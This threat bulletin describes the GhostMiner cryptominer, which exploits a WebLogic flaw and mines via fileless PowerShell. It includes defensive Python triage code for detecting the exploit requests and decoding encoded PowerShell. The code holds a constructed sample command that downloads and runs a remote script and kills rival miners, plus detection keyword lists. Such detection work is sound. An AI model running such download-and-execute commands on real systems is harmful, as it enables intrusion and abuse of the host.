New GhostMiner cryptominer displays unusual attributes
Target: Systems using unpatched versions of Oracle WebLogic server
Attack Vector: Exploitation of CVE-2017-10271 (a Java XMLDecoder deserialisation flaw in the WebLogic WLS Security component, patched in Oracle's October 2017 Critical Patch Update) for initial access, followed by fileless PowerShell execution
Summary: A new strain of cryptocurrency-mining malware, named GhostMiner by the researchers who discovered it, has been observed over the last week. The malware exploits a known vulnerability in Oracle WebLogic servers to gain initial access to a target system. Its distinctive feature is fileless execution: the mining payload is run from PowerShell code in memory rather than dropped to disk. It also scans the host for any other miners already running and terminates their processes before starting its own. Notably, the campaign has earned very little from its mining, suggesting that the threat actor's aims may not be primarily financial.
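Two triage checks a defender would want for the behaviour described above: an inbound check for requests that look like attempts on the WebLogic wls-wsat endpoint abused by CVE-2017-10271, and an on-host check that decodes a PowerShell -EncodedCommand argument (the usual shape of a fileless stage) and flags mining activity and the killing of competing miners. This is an added example, not GhostMiner code, not Oracle or vendor tooling, and not part of the original bulletin; the indicator strings, the sample request and the sample command lines are constructed assumptions for the demo and should be tuned to your own telemetry.

```python
"""Triage helpers for the GhostMiner TTPs summarised above (added example).

  1. flag_wls_wsat_request: does an HTTP request look like an attempt on the
     /wls-wsat/ endpoint abused by CVE-2017-10271 (Java XMLDecoder
     deserialisation)?
  2. classify_powershell: does a process command line carry a base64
     -EncodedCommand payload, and once decoded does the script reference
     in-memory loading, mining, or the killing of other miners?
Indicator lists, sample request and command lines are constructed for the demo.
"""
import base64
import binascii
import re

WLS_WSAT_PREFIX = "/wls-wsat/"
# Strings found in a Java XMLDecoder deserialisation body. A legitimate
# WS-AtomicTransaction SOAP message carries none of them (assumed signature).
XMLDECODER_MARKERS = ("java.beans.XMLDecoder", "<java ",
                      "java.lang.ProcessBuilder", "java.lang.Runtime")

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc ...); -ex is -ExecutionPolicy and must not match.
SWITCH_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")

# Behaviour to surface in a decoded script (assumed indicator lists).
INDICATORS = {
    "fileless-loader": ("downloadstring", "invoke-expression", "iex ",
                        "[system.reflection.assembly]::load", "frombase64string"),
    "mining": ("stratum+tcp", "xmrig", "minerd", "cryptonight", "monero",
               "--donate-level"),
    "kill-other-miners": ("stop-process", "taskkill", "get-process",
                          "win32_process"),
}


def flag_wls_wsat_request(method, path, body):
    """Return a list of reasons this request is suspicious (empty = clean)."""
    reasons = []
    if not path.startswith(WLS_WSAT_PREFIX) or method.upper() != "POST":
        return reasons
    hits = [m for m in XMLDECODER_MARKERS if m in body]
    if hits:
        reasons.append("XMLDecoder markers in wls-wsat POST body: " + ", ".join(hits))
    return reasons


def extract_encoded_command(cmdline):
    """Return the base64 argument of an -EncodedCommand switch, or None."""
    for m in SWITCH_RE.finditer(cmdline):
        switch = m.group(1).lower()
        if "encodedcommand".startswith(switch):
            return m.group(2)
    return None


def decode_encoded_command(b64):
    """Decode an -EncodedCommand argument: base64 over UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def encode_command(script):
    """Inverse of decode_encoded_command; used only to build constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def classify_powershell(cmdline):
    """Return {category: [matched indicators]} for a process command line."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return {}
    script = decode_encoded_command(b64)
    if script is None:
        return {"undecodable-encodedcommand": [b64[:24] + "..."]}
    lowered = script.lower()
    found = {}
    for category, needles in INDICATORS.items():
        hits = [n for n in needles if n in lowered]
        if hits:
            found[category] = hits
    return found


# Constructed samples (documentation IP range, inert SOAP fragment).
SAMPLE_SCRIPT = (
    "$u='http://198.51.100.7/ms.ps1';"
    "IEX (New-Object Net.WebClient).DownloadString($u);"
    "Get-Process | Where-Object {$_.ProcessName -match 'xmrig|minerd'} "
    "| Stop-Process -Force"
)
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT)
BENIGN_CMDLINE = "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1"
SUSPICIOUS_BODY = ('<soapenv:Envelope><soapenv:Header><work:WorkContext>'
                   '<java version="1.8" class="java.beans.XMLDecoder"/>'
                   '</work:WorkContext></soapenv:Header></soapenv:Envelope>')

if __name__ == "__main__":
    print(flag_wls_wsat_request("POST", "/wls-wsat/CoordinatorPortType", SUSPICIOUS_BODY))
    print(classify_powershell(SAMPLE_CMDLINE))
    print(classify_powershell(BENIGN_CMDLINE))
```

Run it over WebLogic access or reverse-proxy logs for the first check and over process-creation telemetry (Sysmon event 1, or Windows 4688 with command-line auditing enabled) for the second. The encoded-command decoder is the part that matters for a fileless stage: without decoding, a command line that is nothing but base64 matches no string indicator at all.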
Risk assessment summary: The threat is assessed as 4b LOW. This is not the first campaign to exploit this WebLogic vulnerability: we are only in March and multiple campaigns have already been found abusing it, which raises the likelihood of further attacks against unpatched servers. In addition, the malware shows signs of being a test that prepares the ground for future operations, so further instances of it are likely.